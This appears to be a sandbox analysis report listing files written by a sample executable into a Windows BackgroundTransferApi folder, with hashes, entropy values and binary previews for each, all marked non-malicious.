                                                                                                                                                                                                    SHA-256:22EB3A5AB5D0208CE7D21F1DE7BCC4794FEEB628F54F752378665DA3921A78A1
                                                                                                                                                                                                    SHA-512:3D560BFD3D53F7381CA60C5425EBD8709E0732ECDCCB747CE5125462B4E8B240297F7F46B91B800D632419B1D06A299393CC5F5349C3490C3283E1965C6F93F6
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..]...!%S6/.....l..]......m.)#.,..S..<H......*.=+....Il...W...hn..."....0..........U...l....~.V.!.U>.}.I.:$."R..N..x.;....f).A#..Z...h?..q...b.^L..[......yXau.JV...,..4.....?.@.f......hO.&...q......B....X..:..k...7.`n..K38.b..f.d.@..nk....45........9..'h..:.V,.....g..C|..OAo..R.M...!fX.........u.m/.M.U.6.|.......:vK2)..7.hc........4.ctA8g..i...?P.D.i;;$~....q.Z.F.Wu...,I].(...\Us..gF........><kQ..Q./.H..!.......<.p.2..?s.$an.....L.D:+uV.LR..|....gzT.;.1...Z.;.Gak.'g..>x.x^>'.....J......IZ._..D...q=j'.c.O.A.......<......v>gD.^...@..x.V.......J.o..l4>.$q,:....0.......u..Qk.-..mqe8aN.\\..J.I....Hs....|..k d.M...=....d.5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d95eca8a-44bc-43b6-9ea5-27eb54fefa6a.c669ea48-4755-4d41-9b26-077c86fefea2.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1425
                                                                                                                                                                                                    Entropy (8bit):7.845882870022826
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:AlqgRx0nKgv1SB9K3KTFumjfnSNUSpxbSTJo2h8nwNs8DwpbKUhORtJ9Q50NobT+:fgLoP6om7eUqxyX8nwNVDwp2UCTuEobK
                                                                                                                                                                                                    MD5:EE5C6C14F439EC6B53F5958B167ECADD
                                                                                                                                                                                                    SHA1:5941B98CA2753B29EA19233DE853E4362F70E421
                                                                                                                                                                                                    SHA-256:C6C0ABB1CA6729E40AB5001369E7524AA080C93C79C3D7DB15BE1BB352466291
                                                                                                                                                                                                    SHA-512:9DD64E15A306CD94C16E7015C4BA47D99C42A80BFAD6A7D20FB5D8B26584E61389A00D92FA367D24E6B480BC0BAAACD83A1B3C2A517BEDC97BF231FC0DA68756
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: g..q.7..!../>...k...\U.....VV.:.......)....|D..s}.cN..`XN98...........";.h.1s\......T.."....+...n.W.*_....5.....'./At.B*R..kBym...-.l.KX,'.6;..%(|..'&-b._=.A..fk....3.U.f.+gu..Aa.F..!.3.g..VU...Q)Z...I.o...Li..I....E.AI\M.wH:1.'."...K.io.}...w.....Y..T.0..v....\..Q9..\.4.S9..o..{......h8}.......t..i...t.G.f....O;)...,..w(.&...,.*.53{.G~I....9/....s.C....7N..wm..o......x.v._.....l.G.....hdr.f.x......!*.....N)pf.._.....{6..[..W..U#.........i..#.;?.......OU...;))r7T....._....c....dO.....Xk&s...SG..g.[z..h...6k..7~...K..gC.\}.......L..cs.c....;`....3F.!?6.}:T.2A.0X^.....c..%m....%.....vdh.g=........-_.e.....+...o/c...LZN\...t..o.S.P....'.v.`...`...d~..$....OFL..{.wP....lR...p...t.!.../8j..j~a>!..,..H}+F..F......n...R.}ol..{...Q...zU.:........f.<.f..7....@.......Ux.{.."...p.o<...G..(.........h...U....ys....d...cMf.q s.vP;.....9h'.....mA..!o..3JZWIy..P...8...a..|$|H`<.....^_[..a...lKq..p.W.....I....oaV......y}vX.:.V^).
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\d95eca8a-44bc-43b6-9ea5-27eb54fefa6a.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.678186372605661
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:kYp+lQ/Bt1N3DKJwdNrXrjOHqMUfO8ry4GTP2kH9H3/uWzCS1tecii9a:kY+lY5jrX2HqO8W4a+kHducCS18bD
                                                                                                                                                                                                    MD5:302A7D2DAF05EE054D7D4021A58AC818
                                                                                                                                                                                                    SHA1:996E5FA14CC6A51EC915124987AB250FB9BF74CA
                                                                                                                                                                                                    SHA-256:4CC3194B0327ADABBE36073914070D144F145D953FECAB4BA1ED63BD21AA4A29
                                                                                                                                                                                                    SHA-512:2E64805809F11DEDF540EAB2491515F313EC0685805D2C9655190BF087FCF1633CC26F674046E48A3A2342D23E7E489EBE7B8C370FDC1D48E27D87382835313B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..xh.....fy.....Y..9'.d].e O../....,.."....90.q....u...2.c.e.TN..A}.uW..p.]....C.-..>Ta.9.T..P0"y.a3N..X-....cH_P.l5.r0...........!.*Kc.......$..71.D.6.....IR.r..<.f.=.a&WT.4V..^mk.k....}.]g;....D..V.'.3.....-.Dz...V...R.)`.n.......qx.]....uN..*....6~.......r.k.T.../{.<h...6.SjP.g_". ..U4;2...V;sL..#.x..3.=.?..+)~_...H.d.l......g..o=...h#7t..b.c.}....).d^J.&..v....j*."....;..}...rZ.n6.W.qu.....y\8-...Ui...E..@.JO^...D.$...G.;...P)=.W.:|..;q}.X.cVp.T!+UU...:).......*Vq..Y._I.e...\X. ..\.#...>.J5.."f..#1..'..9.x...:.w.\...k..u...%.).;:@.....M....|......a..=U....(..tMs...{.....1=...s,...u<(...s.!:.....y.Jz.TCQ.Q...?.%.z.^.+.....ZD5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\da92c040-8893-42c1-b175-7eae926f2b62.f48166e9-1ece-4283-8a62-8749a03680bb.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                    Entropy (8bit):7.870910168177275
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:bsCuGp1Uv9tJnT2rmQde/sSue53CqSG73YgOLrzRV6p5eXfkWKB6nm/nNBAPDMXL:bscUrdGmQw/sSue53Lfo7RV6phRBN/v3
                                                                                                                                                                                                    MD5:821B4B1B14DC6B1F8C6CEBE5A015D163
                                                                                                                                                                                                    SHA1:A2EB49AA24DCD626073BB3699B64370742D6CCB0
                                                                                                                                                                                                    SHA-256:954158E03FA4E47951FC2546768D2702B310258B8D237A6FED9BA0ADE3791B7A
                                                                                                                                                                                                    SHA-512:2A19961BD2E10B17FE6D500788553B266713E0C7E79E5D3A6C8D81A90550B0191D4027F2AF001B968E9572CB5EF1CDCBA56395F274FCB4E7DA2B269D45B4E957
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .;..!.N.;.t....5"...r..s.|.c.$X#=.....Ef.....eC.'...=.}...ZQ]#.C.h....z.D.._.....(k6'.-E.@(.p...o.!1..n..n..~..n.W./.7............}.a.eh.63.s<.`...X..1);S%......Z.z.?9..;....F...]f.....<.X+.. ;.Z.U..o.W..y>>h.....}....'>...BJ}..J|II..<~.U.5.._..X.L..h.o...7......hi..5.N.z.U.,.o.....v.....s..{.v8........8gm.;..j@g.!.s.R...5..r.....q.]y..E......&.4kN...w...mb...'f.....a...+ ....,..Z....$..ko........3.f...e8k....v...jj.r."..O..o.g.d.g.E.."._d.%...;...>....E...p........f.Ur.k..U1Z..e.1n.(......Mi...Lk..x..p..,j.!.......w......I.0.7+".K8-.=[0..4.'..........6.....l..p^.w..J..e...w...8.9R.q#...3.kA.p0.,z.t.....W.......p0e...F..X....;9B.Z..Qx.#5..p1#G...Wj..?x;(.j... \\..Tx...6#r.^.{8.....C..%.....m;....m..t..PZr.a.0...`....C.-(\.n..c...i.d0......../...*9.NDU..rC.h......b...A...Q...31?...V3...(d.W....\.v....$..3..*R..F..IAb....X......T2.+T........z.... .F..F.\...N...!P.........._J/.nNL..F.1.y...G.%.j.........i......,.u3......Oc.]>@...g.4U.....,..m
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\da92c040-8893-42c1-b175-7eae926f2b62.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.6677776941751175
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Zh6oaDlTMOZi5mJNsuBDyt8CaV+yvcfHtWrrsbsf47cii9a:ZhOlTGmJiQyJq0HtWvsZbD
                                                                                                                                                                                                    MD5:579DF44B035F565A95CF3302AC324D1E
                                                                                                                                                                                                    SHA1:A0A0F7D471C58665B572EE69904C626202184F1B
                                                                                                                                                                                                    SHA-256:62E0D37715F056B6C4D7D8DFC3D1BCEBD53AD60A1DB40E5479A928E94A6C377F
                                                                                                                                                                                                    SHA-512:52720E240F84479EE11CD524DC378167C134B779515B6D80F42DED790A6824F11A5A2B54879281D6B79AFB0AC9BB84C58821FF6B22DD3939A1E8A6527E5CE208
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: K.&..Cc.L.}..*9..\B.Fs...3..\....'.1.J.:u....U..D....p.i..@..(6..t..1?..l...`.[..W.0.....Rx.F...W...L..1.].]..._.c.)<SQ.A. .ET7.....8hb,.._......jz....W..D..i=....;T.....re..%.. 6#..#.L)...2>.~... ...\._(S]$i..;wK...9...X..r7)~..;..<.F..%...."....Yr-....0.![.m...5....v.L....A.qe...[.P`.@.gT..2.d..K#..K..e...[.a..J..|k..E.(...$.n....a./K.^.$d[.?<.Z.7..>...8..7.Zhr:.K.'.....9.k.L[.?@......M1.$.......u..b....C..;.....). K...v..u...9....j.....m...;..K.@.....<.[.*.[I2R..2i5tp.".2....1..&l.O<...j.fG..42..s..../i......w_.,..I/d.A.q......3..5.R.................0...O..l...j..l..q(.....G......(o*`..9I......,..(.X.&.b...>.....4d<..X......5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e0bdaa8c-aed2-4867-a889-6148185ecdf0.36aece74-a092-4606-b9ff-8b1de5cc516f.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1421
                                                                                                                                                                                                    Entropy (8bit):7.847877795378966
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:0uULQ4O5lgy44RTdKJyWGgDPFqyRLkpjO1Adc7Ac+289FR1qUDbD:XH/Sv7FOJTN9FR1qUXD
                                                                                                                                                                                                    MD5:17AF3A4D26532445D7C6E47524AB24C5
                                                                                                                                                                                                    SHA1:B37149CAFD3394770EA067804F567F037FC79207
                                                                                                                                                                                                    SHA-256:E5F2C2113D352CDCD8038A69999EF033FFB8C808923CA2304F7ED6972A8A35A8
                                                                                                                                                                                                    SHA-512:E90893C9FC939B06660BDC3E95ADEC6690537540AA05753F2D3137BC5F02DFBF6F862E719349FACD8FEFFDDF5B7875FE02F73511FDFF2E0867F9755E81CD01FC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ^.......8.`V-.6.j......r..Jb.,.&lYsCFc......Ph.....d..O..f...|..d..39...2I..$...kEU./.H.Q.r.5K.....W...s.:)...9........;R:.....f.mf.....RQ&^{..w7..d....Fe..Zy8...S....m<<.<.<....D.:.6Z......U.d.n...Z......./<m..o-.........//x...E\..\..B.D...F ...jgN..{.dl..7.W.0..P...>h.(.mA.*...=......X.XH=k.'7a..&......q........x.......K)._v..yP.7...Z.?.S&..+3[e.......V...v...8....oF..&.n@....hJ<..G.Hn.Lr.2t...........U`s.u.X..i.I...e.s.r.Uv>.ch.J....*5..].....L.5....O.BF...nQ./.g....V..r>.BhvtzF.....L.s..al3^..Je..j.l....H.Bl7..r..Wt......A....%.J-....1s.vk..MH..Xn....(5a....I..^3..\......q@.i...R.2h...b.U.}b.^N....|-.%b..S....\..G..m,..hdw3S.ng~.x..*...N.....5.,.s.M..XE..Az.0.y..L.<.)?....RX......)......)'...e.=l.%...6."I.2.r....H&.S(..,.R.;.c .Iv..ri/..KU....m.d....(q......9.`s.......w.....9-6....tx....f.;...p............5..L...:l.+|9X..O.4.I.@.k)}e.j..>..i.M...>..T../.G..[x.......[C.q....l.....Y9.-..}....."...:.tX.......W.HV;O9h~..yq.0T.....n..S.Cu[..h.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e0bdaa8c-aed2-4867-a889-6148185ecdf0.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):737
                                                                                                                                                                                                    Entropy (8bit):7.696979351328252
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:RoORagKGV0SZxoHS+ezAgYP0ny0WfyJ1U19Vc+MUf9ylnvM/mZfsJLcii9a:RoORagNGly7ZXAfyfU19VPMa9ylnv+mu
                                                                                                                                                                                                    MD5:EBF01CED49821863CE7AA3B21BC98813
                                                                                                                                                                                                    SHA1:0C96F409464DB227B625B67E176CBFF93F4AC9F6
                                                                                                                                                                                                    SHA-256:6035B8491B5272401BB86950B06FEE308557145D7DB780221BF11A2CBF8A59AC
                                                                                                                                                                                                    SHA-512:41D29DEE280AC956A0D87FFB10E93C8EFB95B893135B778F56AA066721F8FC95E1C59B08FBB37D9F7E7137842A1095CA82CF030AC74843EC72665667A1C232E3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .+{...5 ..+Ke...jy.0..r.=.".....:...|...jBm;..2.!....I........".`u...G^-.30.xpb#e?.1..(.;1.s...|Q.......M..xZ~.MP..K....X......H.I..2..;.....].(..+...U......h..."...G..(...i....#......GD.{.{.P..t......7;.....i.L.=..gePU..a.A.......,9.....c....Pp...7|.'..t..'../...g7[y.O..J._5j.nx.0.9..O.].T.E.......%%tv h.xl..S._-Y.s...I.....;..q.WUv.?.b3..84d......WI....^..x....j......g..%G.....T....V+D@..d........U...?....9N...-......<.. ....;..."...`.?./.)..W[..@.3.8.1.....e+.2.O..1...i..l*u...E.S.mJ).rT9.\..5.....f....'\x^C-..}......bs._.B.R...*@...'.....]..w...yh^..1.\<....xO.0..eMGU6R.....0..bQ..yf.c.N..,.u...Y.r..zL..n:....b..5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e93b2583-46f7-487a-8251-9eb0ae99a597.0aa6f7d6-6532-4740-b810-02c374e5025d.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                    Entropy (8bit):7.847147966862037
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:A8dxpnsclL49LhnAmj5wYa7xT2wNIc+Dc6GjlIRyh0WRgCKOlD4akTg36bD:hps/lnAS5wYIawNTv6GjlIA/RgqlD4ao
                                                                                                                                                                                                    MD5:96F1DD1AC10CE3CFD2FB512BECD4C60B
                                                                                                                                                                                                    SHA1:4272E6181B772FD5A87BFE4A3D2C7DD9D787B80E
                                                                                                                                                                                                    SHA-256:22955DD5C94970D740DF3936DC9EC9E7E5946BE3431788594DEDA7DC40B35330
                                                                                                                                                                                                    SHA-512:98DA98BBCC6C752DD716A2333D52CD69AB6F0A9495E24B548CB8D2CCCD55C761EC549A9E0824F16B99CA6646017799E9F336C2C305E76DDA7A9FB9352837E349
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .g..BC`8e4E.....`~].34...cQ..A'3....E..?..u...Kw....\.u...%#.......c8..!..=T2.Q*v..u..|7....=CUsn...B;s.g.+..>...TD..&. g[..f...uRs..W.w.....".F..&9/@.O<r.:j....b....7D..^d.y........=..B.D.fcP..^-.Y.~.NA.z....f.[....4.=.J..])h.j.X..F.%HJ.f.m.....%.0.8T.r.'.@m....x.j.....z....V...7.|U8..*...[qz....DwG*..]P.<..<.....+.E..2Z./.00......7.....0.$n....8..y`i..Fw./bGh4Mi.:.l....0.6.C*13_.EN.,./g..........`>...z^!]..........Vt'.)$v....-...u....c....-U...J..4.Y...ppU..s7.U.....bX=I....D.\I$....|e.%S"R.....i.4.........<......$XO. ....U.....t...Mk.A.x..5.^.E......4.m.6..I.~b.DZ.[............8.0....)..sP...l.|....1!.tPEs..L.\F....8...n`.....k.&6.........k......}Y...Y>.1...:KK"X..I.".4SVy.H...)...5v|.%.7.....P(N.c..........m......mk...R...]...t........nV...R`j0.FGw.[...u..I......?....5|.q...qD..g.v...i....e\(%...B./.i....\.....[.....CHm).<...Q....d}...B..).hG`-j7?7...V?EW.g......Q.Z...6...z....1.rj.Du;/......'fZ.kc.5....k...#A..d.%.e.O{..DRj...'...%.:.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\e93b2583-46f7-487a-8251-9eb0ae99a597.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):735
                                                                                                                                                                                                    Entropy (8bit):7.668139278584725
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:g5TG3+r0WIySeO2LEDXMESy9DPkmXFHBxzoZ4A3AAX75CyK4ZgrXcii9a:OTGXWIyS2LsnSAX9BxI4GAw5bK77bD
                                                                                                                                                                                                    MD5:1E003044BC2685458E690F76A6D9BE3A
                                                                                                                                                                                                    SHA1:39F46D636E337611793C99D29CDFB0CDB363F2E8
                                                                                                                                                                                                    SHA-256:CC869D9374376077ED2258AB72A1664FC3CD545B3E89FF9BFA72DDF6E5B2D6F6
                                                                                                                                                                                                    SHA-512:B11829C8BBEAC06EF49D3B2B1DF97DEA2EED8752118DB789B245CBF6F0CC78AA1DDFD34C51D4601C231505886B55D8D8F96C7D671210DD531AF186663C4DDD9F
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..:..TpFK4.G.....K...C.`.P.....c&.=g<.A......p..oOE.......1C...Lv...~(U.W.V.b.......O..$...../......>a........g.A.........H&.V...{f9.#>...Y..%..w1.....&Q^...V......{.....b.b.E!..>..8..`.J....M4.....B.RD....W.../.Ew.4/..C.2.^.3>..hY.tb.,sHI@m..l,S...M-'...........1...`mzT>.Q.PS....D.T5.O=./.....9...(V...q.K..+>..G]......5=3p.K"....t........E%uh7k...,.a.....t^.....*.O..gb.y.u.=N:V@. .....V.,..e..<`2.=J.....7...L)w..<#h......xz.pX..v.Ev^.RBN~...Q..S..X......du....b......*...%....w.W...N.?@....^E.T...\v#.&6.1.{(..J.$n.vw.j..0{ZJ.@.G...$./...3H....j...wd....%1....[...1m..:..F.qx.....pL.A.../t/4b.....g..$..4.s....{....wp...aT5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f2ad8026-5685-4635-a7c4-ba194549ec04.81dd2cae-b1bd-46ec-80a9-35001b765db0.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                    Entropy (8bit):7.855833113985716
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:nUVTcKOLuc4TEFtnLKJ9nW278dEf0InkBYDrCZh98AN2n7Z1qzs58PBkAZdubD:nqTjOLuc42kuEMIceSz2WjPBkwMD
                                                                                                                                                                                                    MD5:2185242E37A8642BBD20E4572D45BCC3
                                                                                                                                                                                                    SHA1:5687F606DEEBDED71CBB1F667BD15551A8EB91A4
                                                                                                                                                                                                    SHA-256:012490AFF74E3FE66E1BE223C5E7893A9A7A191A6FA68306B4BD031DCAEA68A2
                                                                                                                                                                                                    SHA-512:DB7D8E8334A00E74768DD2CC2ED1CBEBD361E6E927FF4772F94D7A688A9FF9F8A1D4E1668EED8F9468E88DB81835E58C135F7BA8404B343AA9A5C68B6CD7E49C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: (.z...1...N/...B.6.m..9".......Z.O....RyTo.....T.....z..,5rj...).,..$.z$.....!....1....F+kj......&..jB{..x.x.~...L.F.k....N.;....R..O5.bn..G..r""a...~...)]...N...l..t.Eh.@.0.u..U.x.V\..D. S8.q.h.....G.L}.&...v...\..O.....;j........y.*.......7...Q....\....].n.@..~2.B...P.)..6..."..../..;..p.~A 9S....^$}P9.Mt.[...8.:S.....vp+v.v...m1.E@h.c.}3R.3..t.O.ZD...3R.e;. P...,..}k...M.. baldn....Wp.gLi.3.W......S.....!g.Qw..^ ..Ai.M......w....6...]..s...l.X.]...axP..N]...E...x^`{.@&.#..q._].^..nB..k...7.i+.O...T........1.L.?Q... .8....Q..E4.f....v..U=.q.,...zX.~.......O......X......E...c{c.......B0.T..`k..w4.......l.T<BPx.l..{.....#.&.g ......&p|..>">...l.:.h....>.u"X...........Pn(a._H..MkH..|.)_.!....C..T..MP.Bg..r(,R.w...0.u~..+.<.qz|.......F.q?...!.;.7Iw;...H...I..K..O...t.....<.'zy...D..v....b......QM.Tu...yqy[.e...\/n1h.=..Z..........w.S .......>1.*A.N.wl...\..:Y'.......UVy."g-Y./......6.*{.d.Y..c].V.i.D..*}..GW....B>9x4..C....4.+.o.........L.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f2ad8026-5685-4635-a7c4-ba194549ec04.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):735
                                                                                                                                                                                                    Entropy (8bit):7.694578638535219
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:Kgd/mQOK7yjvznXo2u+G9l/CGdsQq1hu+vmVvPqsbohrVkj6kUeSpV5rwRaMKOcq:V9POxvznlGHPdy1M+vmVqsMVBeSRwRaQ
                                                                                                                                                                                                    MD5:FE0F8AD09715CE645B6FE0ACA7B9EAD2
                                                                                                                                                                                                    SHA1:07E9EDA052781A0FD097F9F927B4CD57C3D8265D
                                                                                                                                                                                                    SHA-256:A27D450A2F9EEF857F11907D5BCC494767C2E66A520576BA0AE1A35A03DE0B4C
                                                                                                                                                                                                    SHA-512:990B7DECF2DAF6397307CE28C7B99F1940FA88FFC950EA55559C6570248258DA9843C0C150605B52BAF56F2E228AC688ECD93D20A13E1DA81B67550A8A35DE0C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: 0......9f.mj..LSHRYm,.:....=ze..p.B.....v.&.n':..>..... .?.cG....6..gE.....8......jz./D..Q.n.i[..Q.f#p..Vq}Z2.._.]......:....@tI.B..!.i.....i........z.C...>z..wx...l.....32..B.+.3..Bn.Ek..q.P...p..F....U...w.M..u.F.s9.J..3H\:.r5.F..I6.k.I...<.Dd.Lsqc.Z....R.t.^Pv3..............I....@...Z........-Le.A.r.....c..:.1.....~....0a.D.+..$L.....t.&....Q...J{.!...l..4v...k.D...#.I.....{..{......l.06.].^.D.....w}b.,.]......G.B...Xq..<.(....Y....%.y...>}..Mc#.1.C..l.........?.g...&`.2..v2i.g.,.,/..R....T^.%.p>..S|p..>..{S...............................}3.....o.........(*..x..Di.....i.`/...M...j\.X.[.......w....m.N..E....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f38753f8-fb4e-4853-9b85-55d4eeb88746.551826af-f363-4b2c-81d0-9504a06ef1ce.down_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1427
                                                                                                                                                                                                    Entropy (8bit):7.848487096704413
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:CZkoGFXJlK1lpwXO6ljRIb3qvgTe02W9MEDiIefVEsunFgKgs4p/LmBdAozOqkL/:CAXIl0/e+EhLr1VFPjlHOLXD
                                                                                                                                                                                                    MD5:512ED41CAF0774A835AD98B0F65FDC9C
                                                                                                                                                                                                    SHA1:4444DC8E3612D8FBCACC8FE21FE25FFCB88A2184
                                                                                                                                                                                                    SHA-256:B9151D54C29344D7E562D79DEC3B5B1BFA8563277E94AC4AA8CB81C1BE1F968C
                                                                                                                                                                                                    SHA-512:2A04557C6A2F8F9FAC958AC885BA2B841CEB07B482B0B6474130E7F6CD58E52469D81083D535DCED5C7EB4583062E920E099C341531CDCA89689B063D6E85827
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...?Z....... .O.v.4...(R...d.7......Sq4..7p...,....Eso.E~..':.B"{.^.).H.I..{.b.%......P...].t+-2.....g......K.q.8o.W..a;|c....c....4.......J....._..5..B;.c....X..$l...*Z.....+..+Z.$.+L..4......(i.6......K.......X.C...L.$..H..t..c,....1G..JW.<E... .....k.rm.BM..>(...]e.S.>..P.b.i....x.+BG.V7..`.e.{.z-...xL....7.b/o.*...f..B&..X..z......6).B...".;..x>..G.R.m..{..../.?.j.....I.z@[..u.k...n.9......z.kx.t..x-.]n.P...._.J.j.V.7....>,.l.5.R.b.L.{j.b._....k-.gz.6B|.]b\..D..../U\...v.....j6+.i.......J3...L].g...'._.~6E..+u...9..kC.l.;..d\jn.O.An5.V.H.z.....&.b.."...|...\...C.7RB..h'........h.&....`..?./..<.?........K.%^...y<yD...A.S...Oq..t.(...[5|..3..-.........F.m...x......=.p.....4Y8.d.*.k}.).'.@].@_..B...~\.....P.]iB|....$.b..~..5.JA.v..l.YkgBD51....Iz..o....5'w..%W4'...t...#,...I...?wCH.'N#..C5cA..f6..GP.c...f...T.&.A.....o.2.8.&...d"...D.$............}.X........w.D..Mu.-......x.A.m...d.X.....y.....7a..%4........[.i.p7@..-..K.q...sn..~wa./.a..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f38753f8-fb4e-4853-9b85-55d4eeb88746.up_meta
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):739
                                                                                                                                                                                                    Entropy (8bit):7.658907231290123
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:J9gGOkiCMIwFQrRj0KMBC88hBMAKU4gt4gsE4nGrSvJ5yM0zcg5sNhQDRswcii9a:J9gGLi/FQlj0jKHfn4d3GrioVfsgD6wX
